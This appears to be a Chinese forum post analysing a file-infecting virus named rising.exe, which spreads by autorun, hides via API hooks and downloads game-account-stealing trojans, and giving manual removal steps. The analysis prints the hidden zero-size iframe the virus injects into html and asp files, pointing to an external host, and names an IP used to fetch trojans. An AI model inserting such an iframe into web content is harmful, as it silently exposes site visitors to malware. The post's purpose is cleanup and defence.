病毒破坏：(分析报告如下： 到系统文件夹)

解决办法：

病毒破坏：

前几天中了一个这病毒， 在网上找到了解决方法，发出来和大家一起分析一下。该病毒主要破坏功能有：

1.感染exe 并使得被感染的exe的公司等属性变为“番茄花园”

2.感染html asp 等文件 插入恶意代码

3.通过双击磁盘启动

4.下载木马，盗取网游帐号

5.修改注册表，使系统无法显示隐藏文件

6.通过hook API 函数导致任务管理器中无法看见其进程！（这点十分可恶）！

分析报告如下：

File: rising.exe

Size: 64775 bytes

File Version: 1.00

MD5: 86311B37D938BB35645E7B092014DD63

SHA1: 47C324A5A691DD31DC0410E51ADBD35065E6C7C3

CRC32: 88ABBD9B rising.exe 运行后 首先释放一个rising.eve的文件 然后由rising.exe启动他

之后 释放139CA82A.EXE 139CA82A.dll（随机的8个数字字母组合成的文件名）到系统文件夹

注册服务139CA82A.EXE

139CA82A.EXE控制winlogon进程 使得139CA82A.dll插入几乎所有进程

释放rising.exe 和autorun.inf 到每个分区，使得双击磁盘启动

感染除系统分区外的exe文件 使得其公司名全变为番茄花园

感染 html asp 等文件 在其后面插入代码

<iframe src="http://web yulett cn/count.htm" width="0" height="0" frameborder="0"></iframe>

修改系统时间 随机把年份往前调 月，日不变

修改 HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL\\CheckedValue:

值为 0x00000000

导致无法显示临时文件

rising.exe 还会hook 多个 API函数 使其进程在任务管理器中隐藏

使用Explorer.exe连接网络 61.152.92.98:80下载木马

下载的木马一般为K117815XXXXX.exe

XXXXX代表随机

到系统文件夹

由于 每台机器上下载的木马的名称不同 但最后结果相同 所以中间释放的过程省略

最后 这些木马运行后分别释放了如下文件

C:\\WINDOWS\\system32\\buchehuo.exe（创建了服务inetsvr）

C:\\WINDOWS\\system32\\cmdbs.dll

C:\\WINDOWS\\cmdbs.exe

C:\\WINDOWS\\system32\\Kvsc3.dll

C:\\WINDOWS\\Kvsc3.exe

C:\\WINDOWS\\system32\\mppds.dll

C:\\WINDOWS\\mppds.exe

C:\\WINDOWS\\system32\\msccrt.dll

C:\\WINDOWS\\msccrt.exe

C:\\WINDOWS\\system32\\winform.dll

C:\\WINDOWS\\winform.exe

C:\\WINDOWS\\system32\\winsock.exe

临时文件夹下 释放upxdnd.exe和upxdnd.dll

解决办法：

安全模式下(开机后不断 按F8键 然后出来一个高级菜单 选择第一项 安全模式 进入系统)

首先把系统日期 改回来

然后打开sreng

启动项目 注册表 删除如下项目

<upxdnd><C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\upxdnd.exe> []

<msccrt><C:\\WINDOWS\\msccrt.exe> []

<cmdbs><C:\\WINDOWS\\cmdbs.exe> []

<mppds><C:\\WINDOWS\\mppds.exe> []

<Kvsc3><C:\\WINDOWS\\Kvsc3.exe> []

<winform><C:\\WINDOWS\\winform.exe> []

“启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”，

选中以下项目，点“删除服务”，再点“设置”，在弹出的框中点“否”：

139CA82A / 139CA82A

Wireless Zero Conflguration / inetsvr

把下面的 代码拷入记事本中然后另存为1.reg文件

Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL]

"RegPath"="Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced"

"Text"="@shell32.dll,-30500"

"Type"="radio"

"CheckedValue"=dword:00000001

"ValueName"="Hidden"

"DefaultValue"=dword:00000002

"HKeyRoot"=dword:80000001

"HelpID"="shell.hlp#51105"

双击1.reg把这个注册表项导入注册表

然后双击我的电脑－工具－文件夹选项－查看－显示所有文件和文件夹，把“隐藏受保护的系统文件”的勾去掉。

右键 点击C盘 点击右键菜单中的“打开”打开C盘 （千万不要双击）

删除 如下文件

C:\\rising.exe

C:\\autorun.inf

C:\\WINDOWS\\system32\\buchehuo.exe

C:\\WINDOWS\\system32\\cmdbs.dll

C:\\WINDOWS\\cmdbs.exe

C:\\WINDOWS\\system32\\Kvsc3.dll

C:\\WINDOWS\\Kvsc3.exe

C:\\WINDOWS\\system32\\mppds.dll

C:\\WINDOWS\\mppds.exe

C:\\WINDOWS\\system32\\msccrt.dll

C:\\WINDOWS\\msccrt.exe

C:\\WINDOWS\\system32\\winform.dll

C:\\WINDOWS\\winform.exe

C:\\WINDOWS\\system32\\winsock.exe

C:\\WINDOWS\\unspapik.txt

C:\\WINDOWS\\wiasevct.txt

C:\\WINDOWS\\wiasvctr.txt

C:\\WINDOWS\\ganran.txt

C:\\WINDOWS\\system32\\139CA82A.DLL（随机的8个数字字母组合成的文件名）

C:\\WINDOWS\\system32\\139CA82A.EXE（随机的8个数字字母组合成的文件名）

C:\\WINDOWS\\system32\\K117815XXXXX.exe（XXXXX代表随机数字）

清空C:\\Documents and Settings\\用户名\\Local Settings\\Temp

右键 点击分别打开系统分区以外的分区 还是点击右键菜单中的“打开” （千万不要双击）

删除每个分区下面的autorun.inf和rising.exe文件；

最后用杀毒软件全盘扫描。